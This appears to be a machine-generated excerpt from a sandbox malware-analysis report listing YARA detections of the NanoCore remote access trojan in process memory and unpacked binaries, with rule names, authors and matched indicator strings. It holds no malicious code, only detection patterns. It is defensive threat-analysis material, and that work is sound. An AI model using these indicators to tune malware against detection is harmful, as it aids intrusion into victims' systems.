00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x19ef5:$a: NanoCore 0x19f4e:$a: NanoCore 0x19f8b:$a: NanoCore 0x1a004:$a: NanoCore 0x22ad8:$a: NanoCore 0x22afd:$a: NanoCore 0x22b56:$a: NanoCore 0x32cf3:$a: NanoCore 0x32d19:$a: NanoCore 0x32d75:$a: NanoCore 0x3fbca:$a: NanoCore 0x3fc23:$a: NanoCore 0x3fc56:$a: NanoCore 0x3fe82:$a: NanoCore 0x3fefe:$a: NanoCore 0x40517:$a: NanoCore 0x40660:$a: NanoCore 0x40b34:$a: NanoCore 0x40e1b:$a: NanoCore 0x40e32:$a: NanoCore 0x463d0:$a: NanoCore
Process Memory Space: opjlpsercy.exe PID: 2248	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x7ac04:$x1: NanoCore.ClientPluginHost 0x7ac65:$x2: IClientNetworkHost 0x8006a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8dfdc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: opjlpsercy.exe PID: 2248	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: opjlpsercy.exe PID: 2248	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x7a709:$a: NanoCore 0x7a725:$a: NanoCore 0x7a880:$a: NanoCore 0x7a88f:$a: NanoCore 0x7ab68:$a: NanoCore 0x7ab94:$a: NanoCore 0x7ac04:$a: NanoCore 0x8a646:$a: NanoCore 0x8a658:$a: NanoCore 0x8a694:$a: NanoCore 0x7a7b0:$b: ClientPlugin 0x7a8d9:$b: ClientPlugin 0x7ab9d:$b: ClientPlugin 0x7ac0d:$b: ClientPlugin 0x8a661:$b: ClientPlugin 0x8a69d:$b: ClientPlugin 0x7aa26:$c: ProjectData 0x8a593:$c: ProjectData 0x7bb62:$d: DESCrypto 0x8aef1:$d: DESCrypto 0x85eef:$e: KeepAlive
Process Memory Space: vbc.exe PID: 2808	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x108066:$x1: NanoCore.ClientPluginHost 0x1080c7:$x2: IClientNetworkHost 0x10d4cc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x11b43e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: vbc.exe PID: 2808	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: vbc.exe PID: 2808	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x107b6b:$a: NanoCore 0x107b87:$a: NanoCore 0x107ce2:$a: NanoCore 0x107cf1:$a: NanoCore 0x107fca:$a: NanoCore 0x107ff6:$a: NanoCore 0x108066:$a: NanoCore 0x117aa8:$a: NanoCore 0x117aba:$a: NanoCore 0x117af6:$a: NanoCore 0x107c12:$b: ClientPlugin 0x107d3b:$b: ClientPlugin 0x107fff:$b: ClientPlugin 0x10806f:$b: ClientPlugin 0x117ac3:$b: ClientPlugin 0x117aff:$b: ClientPlugin 0x107e88:$c: ProjectData 0x1179f5:$c: ProjectData 0x108fc4:$d: DESCrypto 0x118353:$d: DESCrypto 0x113351:$e: KeepAlive
Process Memory Space: vbc.exe PID: 2364	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1cb8:$x1: NanoCore.ClientPluginHost 0x14dad:$x1: NanoCore.ClientPluginHost 0x2d8d3:$x1: NanoCore.ClientPluginHost 0x26b63a:$x1: NanoCore.ClientPluginHost 0x29d795:$x1: NanoCore.ClientPluginHost 0x2b69a3:$x1: NanoCore.ClientPluginHost 0x2ca81f:$x1: NanoCore.ClientPluginHost 0x2e5b88:$x1: NanoCore.ClientPluginHost 0x2f6236:$x1: NanoCore.ClientPluginHost 0x303761:$x1: NanoCore.ClientPluginHost 0x30d4ab:$x1: NanoCore.ClientPluginHost 0x3586e9:$x1: NanoCore.ClientPluginHost 0x488a10:$x1: NanoCore.ClientPluginHost 0x48b7f8:$x1: NanoCore.ClientPluginHost 0x496114:$x1: NanoCore.ClientPluginHost 0x4a8c91:$x1: NanoCore.ClientPluginHost 0x4ab67b:$x1: NanoCore.ClientPluginHost 0x4aead0:$x1: NanoCore.ClientPluginHost 0x4b16bb:$x1: NanoCore.ClientPluginHost 0x4b885f:$x1: NanoCore.ClientPluginHost 0x4bd6ba:$x1: NanoCore.ClientPluginHost
Process Memory Space: vbc.exe PID: 2364	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: vbc.exe PID: 2364	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1cb8:$a: NanoCore 0x204e:$a: NanoCore 0x219f:$a: NanoCore 0x119c0:$a: NanoCore 0x11aaf:$a: NanoCore 0x14dad:$a: NanoCore 0x15143:$a: NanoCore 0x15294:$a: NanoCore 0x24a23:$a: NanoCore 0x24b12:$a: NanoCore 0x2d8d3:$a: NanoCore 0x2d94d:$a: NanoCore 0x2e4d7:$a: NanoCore 0x2e51d:$a: NanoCore 0x2edb1:$a: NanoCore 0x26b13f:$a: NanoCore 0x26b15b:$a: NanoCore 0x26b2b6:$a: NanoCore 0x26b2c5:$a: NanoCore 0x26b59e:$a: NanoCore 0x26b5ca:$a: NanoCore
Process Memory Space: opjlpsercy.exe PID: 2236	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1cb8:$x1: NanoCore.ClientPluginHost 0x1494c:$x1: NanoCore.ClientPluginHost 0x3b5d7:$x1: NanoCore.ClientPluginHost 0x3e432:$x1: NanoCore.ClientPluginHost 0x48d4c:$x1: NanoCore.ClientPluginHost 0x5b8c7:$x1: NanoCore.ClientPluginHost 0x5e2b1:$x1: NanoCore.ClientPluginHost 0x61706:$x1: NanoCore.ClientPluginHost 0x642f1:$x1: NanoCore.ClientPluginHost 0x6b4a7:$x1: NanoCore.ClientPluginHost 0x70302:$x1: NanoCore.ClientPluginHost 0x7cadc:$x1: NanoCore.ClientPluginHost 0x83c24:$x1: NanoCore.ClientPluginHost 0x9bca7:$x1: NanoCore.ClientPluginHost 0xc8ab9:$x1: NanoCore.ClientPluginHost 0x105058:$x1: NanoCore.ClientPluginHost 0x107e25:$x1: NanoCore.ClientPluginHost 0x11273f:$x1: NanoCore.ClientPluginHost 0x1252ba:$x1: NanoCore.ClientPluginHost 0x127ca4:$x1: NanoCore.ClientPluginHost 0x12b0f9:$x1: NanoCore.ClientPluginHost
Process Memory Space: opjlpsercy.exe PID: 2236	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: opjlpsercy.exe PID: 2236	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1cb8:$a: NanoCore 0x204e:$a: NanoCore 0x219f:$a: NanoCore 0x119a6:$a: NanoCore 0x11a95:$a: NanoCore 0x1494c:$a: NanoCore 0x14ce2:$a: NanoCore 0x14e33:$a: NanoCore 0x245c2:$a: NanoCore 0x246b1:$a: NanoCore 0x3b4c9:$a: NanoCore 0x3b56a:$a: NanoCore 0x3b5d7:$a: NanoCore 0x3b698:$a: NanoCore 0x3c569:$a: NanoCore 0x3c5bc:$a: NanoCore 0x3c5f5:$a: NanoCore 0x3c668:$a: NanoCore 0x3e3f5:$a: NanoCore 0x3e432:$a: NanoCore 0x3e4bb:$a: NanoCore
Click to see the 82 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.49d0000.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.vbc.exe.49d0000.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
4.2.vbc.exe.1da0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.1da0000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.1da0000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
7.2.opjlpsercy.exe.3339f42.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.3339f42.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.vbc.exe.55e0000.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
5.2.vbc.exe.55e0000.23.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
5.2.vbc.exe.5460000.19.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
5.2.vbc.exe.5460000.19.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
5.2.vbc.exe.5620000.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
5.2.vbc.exe.5620000.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
5.2.vbc.exe.5620000.25.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.5610000.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
5.2.vbc.exe.5610000.24.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
7.1.opjlpsercy.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.1.opjlpsercy.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.1.opjlpsercy.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.1.opjlpsercy.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.5450000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
5.2.vbc.exe.5450000.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
5.2.vbc.exe.33d6174.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.vbc.exe.33d6174.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.vbc.exe.415058.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.415058.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.2.vbc.exe.415058.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.415058.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.opjlpsercy.exe.1c91458.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.opjlpsercy.exe.1c91458.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.opjlpsercy.exe.1c91458.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.opjlpsercy.exe.1c91458.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.4430000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.4430000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.2.vbc.exe.4430000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.4430000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.vbc.exe.5624629.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.vbc.exe.5624629.26.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
5.2.vbc.exe.5624629.26.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.55e0000.23.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
5.2.vbc.exe.55e0000.23.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
7.1.opjlpsercy.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.1.opjlpsercy.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.1.opjlpsercy.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
7.2.opjlpsercy.exe.21968f0.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x9c23:$x1: NanoCore.ClientPluginHost 0x19ee1:$x1: NanoCore.ClientPluginHost 0x27097:$x1: NanoCore.ClientPluginHost 0x2d6c1:$x1: NanoCore.ClientPluginHost 0x336e0:$x1: NanoCore.ClientPluginHost 0x3d197:$x1: NanoCore.ClientPluginHost 0x4760f:$x1: NanoCore.ClientPluginHost 0x5274d:$x1: NanoCore.ClientPluginHost 0x5e53f:$x1: NanoCore.ClientPluginHost 0x6a39a:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9c4d:$x2: IClientNetworkHost 0x19f0e:$x2: IClientNetworkHost 0x270d0:$x2: IClientNetworkHost 0x2d6fa:$x2: IClientNetworkHost 0x3d2f4:$x2: IClientNetworkHost 0x47648:$x2: IClientNetworkHost 0x52767:$x2: IClientNetworkHost 0x5e559:$x2: IClientNetworkHost 0x6a3d7:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.21968f0.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x9c23:$x2: NanoCore.ClientPluginHost 0x19ee1:$x2: NanoCore.ClientPluginHost 0x27097:$x2: NanoCore.ClientPluginHost 0x2d6c1:$x2: NanoCore.ClientPluginHost 0x336e0:$x2: NanoCore.ClientPluginHost 0x3d197:$x2: NanoCore.ClientPluginHost 0x4760f:$x2: NanoCore.ClientPluginHost 0x5274d:$x2: NanoCore.ClientPluginHost 0x5e53f:$x2: NanoCore.ClientPluginHost 0x6a39a:$x2: NanoCore.ClientPluginHost 0x1aeb0:$s2: FileCommand 0x1261:$s3: PipeExists 0x3e0ed:$s3: PipeExists 0x1136:$s4: PipeCreated 0xbad3:$s4: PipeCreated 0x1f8b2:$s4: PipeCreated 0x271b4:$s4: PipeCreated 0x2d7dc:$s4: PipeCreated 0x337be:$s4: PipeCreated 0x3d38d:$s4: PipeCreated
7.2.opjlpsercy.exe.21968f0.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x9bfe:$a: NanoCore 0x9c23:$a: NanoCore 0x9c7c:$a: NanoCore 0x19ebb:$a: NanoCore 0x19ee1:$a: NanoCore 0x19f3d:$a: NanoCore 0x26ddf:$a: NanoCore 0x26e38:$a: NanoCore 0x26e6b:$a: NanoCore 0x27097:$a: NanoCore 0x27113:$a: NanoCore 0x2772c:$a: NanoCore 0x27875:$a: NanoCore 0x27d49:$a: NanoCore 0x28030:$a: NanoCore 0x28047:$a: NanoCore 0x2d6c1:$a: NanoCore
5.2.vbc.exe.221641c.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14de5:$x1: NanoCore.ClientPluginHost 0x21f57:$x1: NanoCore.ClientPluginHost 0x284ad:$x1: NanoCore.ClientPluginHost 0x2e488:$x1: NanoCore.ClientPluginHost 0x37efb:$x1: NanoCore.ClientPluginHost 0x4232f:$x1: NanoCore.ClientPluginHost 0x4d319:$x1: NanoCore.ClientPluginHost 0x590c7:$x1: NanoCore.ClientPluginHost 0x64e56:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e12:$x2: IClientNetworkHost 0x21f90:$x2: IClientNetworkHost 0x284e6:$x2: IClientNetworkHost 0x38058:$x2: IClientNetworkHost 0x42368:$x2: IClientNetworkHost 0x4d333:$x2: IClientNetworkHost 0x590e1:$x2: IClientNetworkHost 0x64e93:$x2: IClientNetworkHost
5.2.vbc.exe.221641c.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dbf:$a: NanoCore 0x14de5:$a: NanoCore 0x14e41:$a: NanoCore 0x21c9f:$a: NanoCore 0x21cf8:$a: NanoCore 0x21d2b:$a: NanoCore 0x21f57:$a: NanoCore 0x21fd3:$a: NanoCore 0x225ec:$a: NanoCore 0x22735:$a: NanoCore 0x22c09:$a: NanoCore 0x22ef0:$a: NanoCore 0x22f07:$a: NanoCore 0x284ad:$a: NanoCore 0x28527:$a: NanoCore 0x2e488:$a: NanoCore 0x2e4d2:$a: NanoCore 0x2f12c:$a: NanoCore
5.2.vbc.exe.55b0000.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
5.2.vbc.exe.55b0000.20.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
